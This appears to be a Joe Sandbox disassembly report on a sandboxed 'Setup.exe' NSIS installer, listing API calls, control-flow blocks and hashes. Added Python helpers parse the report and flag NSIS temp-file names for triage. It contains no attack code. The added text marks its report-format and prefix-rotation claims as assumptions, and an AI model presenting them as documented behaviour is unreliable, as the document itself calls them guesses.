Control-flow Graph

APIs
• lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
• lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
• lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
• SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
• SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:
• API String ID: 2740478559-0
• Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
• Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Control-flow Graph (rendered graph not captured; recovered basic blocks and edges)
• Blocks: 729 401eb9-401ec4; 730 401f24-401f26; 731 401ec6-401ec9; 732 401f53-401f7b GlobalAlloc call 406831; 733 401f28-401f2a; 734 401ed5-401ee3 call 4062cf; 735 401ecb-401ecf; 736 401f3c-401f4e call 406035; 737 401f2c-401f36 call 4062cf; 738 401ed1-401ed3; 742 401ef7-402e50 call 406035 * 3; 747 401ee4-402702 call 406831; 750 4030e3-4030f2; 751 402387-40238d GlobalFree; 762 402708-40270e
• Edges: 729->730, 729->731, 730->732, 730->733, 731->734, 731->735, 732->750, 732->751, 733->736, 733->737, 734->747, 735->731, 735->738, 736->751, 737->736, 738->734, 738->742, 742->750, 747->762, 751->750, 762->750
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNELBASE(008E8328), ref: 00402387
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$HandbookFirmware$Pop: stack empty
• API String ID: 1459762280-2534795225
• Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
• Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Control-flow Graph (rendered graph not captured; recovered basic blocks and edges)
• Blocks: 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW; 767 4030e3-4030f2; 768 40232b-402339 GlobalAlloc; 770 40233f-40234e GetFileVersionInfoW; 772 402350-402367 VerQueryValueW; 773 402384-40238d GlobalFree; 774 402369-402381 call 405f7d * 2
• Edges: 764->767, 764->768, 768->767, 768->770, 770->772, 770->773, 772->773, 772->774, 773->767, 774->773
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• GlobalFree.KERNELBASE(008E8328), ref: 00402387
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
• Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Control-flow Graph (rendered graph not captured; recovered basic blocks and edges)
• Blocks: 780 402b23-402b37 GlobalAlloc; 781 402b39-402b49 call 401446; 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA; 787 402b70-402b73; 788 402b93; 789 402b75-402b8d call 405f96 WriteFile; 791 4030e3-4030f2; 795 402384-40238d GlobalFree
• Edges: 780->781, 780->782, 781->787, 782->787, 787->788, 787->789, 788->791, 789->788, 789->795, 795->791
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
• Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Control-flow Graph (rendered graph not captured; recovered basic blocks and edges)
• Blocks: 797 402713-40273b call 406035 * 2; 802 402746-402749; 803 40273d-402743 call 40145c; 805 402755-402758; 806 40274b-402752 call 40145c; 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW; 810 40275a-402761 call 40145c
• Edges: 797->802, 797->803, 802->805, 802->806, 803->802, 805->809, 805->810, 806->805, 810->809
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: <RM>$HandbookFirmware$WriteINIStr: wrote [%s] %s=%s in %s
• API String ID: 247603264-1642411435
• Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
• Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
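The function blocks in this section reference NSIS exehead diagnostic strings ("NSIS Error", "Exch: stack < %d elements", "Pop: stack empty", "WriteINIStr: wrote [%s] %s=%s in %s", and the "<RM>" marker WriteINIStr uses for deletions), so they belong to the installer stub's own runtime rather than to the code the stub unpacks; triage of a report this long is faster if those functions are recognised and set aside. The Python below is an added example, not Joe Sandbox's or NSIS's code. It parses the "APIs" lines and the control_flow_graph dump in the exact layout shown on this page (that layout, and the assumption that the report joins "String ID" values with "$", are inferred from these blocks and are not a documented format) and flags functions whose referenced strings are known NSIS stub strings. The sample input is copied from the 0x4022FD (GetFileVersionInfo) block above.

```python
"""Structured view of one Joe Sandbox per-function block: the '• Api.MODULE(args), ref: addr'
call list and the 'control_flow_graph ...' basic-block/edge dump."""
from __future__ import annotations
import re
from collections import deque
from dataclasses import dataclass

API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
ADDR_RANGE_RE = re.compile(r"^[0-9a-fA-F]{6,8}(?:-[0-9a-fA-F]{6,8})?$")  # 'start-end' or lone 'start'
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

# Diagnostic strings of the NSIS installer stub (exehead: exec.c / Main.c). A function
# referencing them is installer-runtime code, not the dropped payload.
NSIS_STUB_STRINGS = {
    "NSIS Error", "Pop: stack empty", "Exch: stack < %d elements",
    "WriteINIStr: wrote [%s] %s=%s in %s", "<RM>",
}

# Constructed input: the API lines and graph dump of this report's 0x4022FD function block.
SAMPLE_API_LINES = [
    "• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C",
    "• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E",
    "• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347",
    "• VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360",
    "  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A",
    "• GlobalFree.KERNELBASE(008E8328), ref: 00402387",
    "Memory Dump Source",  # not an API line; the parser must skip it
]
SAMPLE_CFG_LINE = (
    "control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW "
    "767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 "
    "770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW "
    "770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 "
    "call 405f7d * 2 772->774 773->767 774->773"
)

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: int | None          # call-site address ('ref:'), if the report gives one
    subcall_of: int | None   # set when marked 'Part of subcall function <addr>'

@dataclass
class Cfg:
    blocks: dict[int, tuple[int, int, str]]  # node id -> (start, end, label)
    edges: list[tuple[int, int]]             # (src, dst) node ids

def parse_api_line(line: str) -> ApiCall | None:
    """Parse one API-list line; returns None for headings and other non-API lines."""
    m = API_RE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    return ApiCall(m["api"], m["module"], args,
                   int(m["ref"], 16) if m["ref"] else None,
                   int(m["sub"], 16) if m["sub"] else None)

def parse_cfg(line: str) -> Cfg:
    """Tokenise 'control_flow_graph N start-end [label ...] A->B ...' into blocks and edges."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    blocks: dict[int, list] = {}
    edges: list[tuple[int, int]] = []
    cur = None
    i = 1
    while i < len(toks):
        t = toks[i]
        if (edge := EDGE_RE.match(t)):
            edges.append((int(edge[1]), int(edge[2])))
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RANGE_RE.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")   # a lone address (e.g. '788 402b93') is a 1-address block
            cur = int(t)
            blocks[cur] = [int(lo, 16), int(hi or lo, 16), []]
            i += 1                                  # the address range token is consumed too
        elif cur is not None:
            blocks[cur][2].append(t)                # label text: API names, 'call <addr>', '* n'
        i += 1
    return Cfg({k: (s, en, " ".join(lab)) for k, (s, en, lab) in blocks.items()}, edges)

def api_sequence(lines) -> list[str]:
    """Direct API calls of the function in call-site order (subcall entries excluded)."""
    calls = [c for c in map(parse_api_line, lines)
             if c and c.subcall_of is None and c.ref is not None]
    return [c.api for c in sorted(calls, key=lambda c: c.ref)]

def reachable(cfg: Cfg, start: int) -> set[int]:
    """Node ids reachable from `start` over the recovered edges (BFS)."""
    seen, todo = {start}, deque([start])
    while todo:
        n = todo.popleft()
        for src, dst in cfg.edges:
            if src == n and dst not in seen:
                seen.add(dst)
                todo.append(dst)
    return seen

def string_ids(field: str) -> list[str]:
    """Split a 'String ID:' value on the report's '$' separator (a string that itself
    contains '$', such as an NSIS variable name, would be split too; check by eye)."""
    return [s for s in field.split("$") if s]

def is_nsis_stub(strings) -> bool:
    """True when any referenced string is a known NSIS exehead diagnostic."""
    return any(s in NSIS_STUB_STRINGS for s in strings)

if __name__ == "__main__":
    print(api_sequence(SAMPLE_API_LINES))
    cfg = parse_cfg(SAMPLE_CFG_LINE)
    print(len(cfg.blocks), "blocks,", len(cfg.edges), "edges; reachable from 764:",
          sorted(reachable(cfg, 764)))
    print(is_nsis_stub(string_ids("<RM>$HandbookFirmware$WriteINIStr: wrote [%s] %s=%s in %s")))
```

Running it on the 0x4022FD block yields the call-site-ordered sequence GetFileVersionInfoSizeW, GlobalAlloc, GetFileVersionInfoW, VerQueryValueW, GlobalFree (the wsprintfW entry is dropped because the report attributes it to subcall 0x405F7D), seven basic blocks with ten edges, and a positive NSIS-stub flag for the 0x402713 block's strings. Feeding every block of the report through the same functions gives a per-function API sequence and string set that can be diffed against a clean NSIS stub so that only the non-stub functions need manual reversing.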

Control-flow Graph
• Block 818 (4021b5-40220b): 4 calls to 40145c, call 404f9e, ShellExecuteW; edges to 829 and 830
• Block 830 (40220d-40221b): call 4062cf; edge to 829
• Block 829 (402223-4030f2): call 4062cf
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247
• Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
• Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Control-flow Graph
• Block 838 (405eab-405eb7): edge to 839
• Block 839 (405eb8-405eec): GetTickCount, GetTempFileNameW; edges to 840 and 841
• Block 841 (405eee-405ef0): edges to 839 (back edge, the call is retried) and 842
• Block 842 (405ef2): edge to 843
• Block 840 (405efb-405efd): edge to 843
• Block 843 (405ef5-405ef8)
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
• Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
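The function above is a temp-file creation loop: block 839 calls GetTickCount and then GetTempFileNameW with the string "nsa" as the prefix, and block 841 branches back to 839 when the call fails. Together with the ExecShell, RMDir and WriteINIStr log strings in the neighbouring functions this is the shape of the NSIS installer runtime, but treat that attribution as an inference from the visible strings, not a finding stated by the report. The following is an added example, not code from the report, the sample or any installer project: it models the loop in Python and derives a matcher for the file names such a loop produces. Assumptions: that the third prefix character is derived from the tick count, so the prefix rotates through "nsa".."nsz" (only "nsa" is visible in the dump), and that GetTempFileNameW is called with uUnique = 0, which per the Win32 documentation yields a name of the form <prefix><up to four hex digits>.tmp. The fake GetTempFileNameW in demo() and the SAMPLE_PATHS are constructed.

```python
import re
import string
from typing import Callable, Iterable, List, Optional

# Assumption (not visible in the dump): the third prefix character is derived
# from the tick count, so the prefix rotates through "nsa".."nsz".
def temp_prefix(tick_count: int) -> str:
    return "ns" + string.ascii_lowercase[tick_count % 26]

# GetTempFileNameW(dir, prefix, 0, buf) creates "<dir>\<prefix><hex>.tmp", where
# <prefix> is at most three characters and <hex> is up to four hex digits
# (documented Win32 behaviour). The prefix letter is kept case-sensitive so that
# an uppercase hex digit is not mistaken for the rotating letter.
LOOP_STYLE_TMP = re.compile(r"(?:^|\\)ns[a-z][0-9A-Fa-f]{1,4}\.(?:tmp|TMP)$")

def is_loop_style_temp_name(path: str) -> bool:
    """True for names such as nsa1B2C.tmp or nsz7.tmp in a temp directory."""
    return LOOP_STYLE_TMP.search(path) is not None

def simulate_loop(tick_counts: Iterable[int],
                  get_temp_file_name: Callable[[str], Optional[str]]) -> Optional[str]:
    """Mirror the CFG: block 839 calls GetTickCount then GetTempFileNameW;
    on failure block 841 takes the back edge to 839 and retries with the next
    tick-derived prefix; on success the name is returned; once the candidate
    list is exhausted the loop gives up (the dump does not show the bound)."""
    for tick in tick_counts:
        name = get_temp_file_name(temp_prefix(tick))
        if name:
            return name
    return None

def demo() -> Optional[str]:
    """Constructed scenario (hypothetical data): the first two candidate
    prefixes collide with existing files, so GetTempFileNameW fails twice."""
    taken = {"nsa", "nsb"}

    def fake_get_temp_file_name(prefix: str) -> Optional[str]:
        # Stand-in for GetTempFileNameW: None on failure, else the created name.
        return None if prefix in taken else prefix + "1A2B.tmp"

    # Ticks 26, 27, 28 map to prefixes nsa, nsb, nsc.
    return simulate_loop([26, 27, 28], fake_get_temp_file_name)

# Constructed sample paths of the kind a responder pulls from file-creation
# telemetry; only the first two have the loop's naming pattern.
SAMPLE_PATHS = [
    r"C:\Users\user\AppData\Local\Temp\nsa1B2C.tmp",
    r"C:\Users\user\AppData\Local\Temp\nsz7.tmp",
    r"C:\Users\user\AppData\Local\Temp\setup.tmp",
    r"C:\Windows\Temp\nsa12345.tmp",
]

def flag_paths(paths: Iterable[str]) -> List[str]:
    """Return the paths whose final component matches the loop's naming pattern."""
    return [p for p in paths if is_loop_style_temp_name(p)]

if __name__ == "__main__":
    print(demo())
    print(flag_paths(SAMPLE_PATHS))
```

Matching on the name alone is noisy: every installer built on the same runtime, legitimate or not, leaves the same ns?XXXX.tmp names, so pair a hit with the creating process (here Setup.exe) and with what is subsequently written under that path before treating it as an indicator.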
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
• Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
• Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
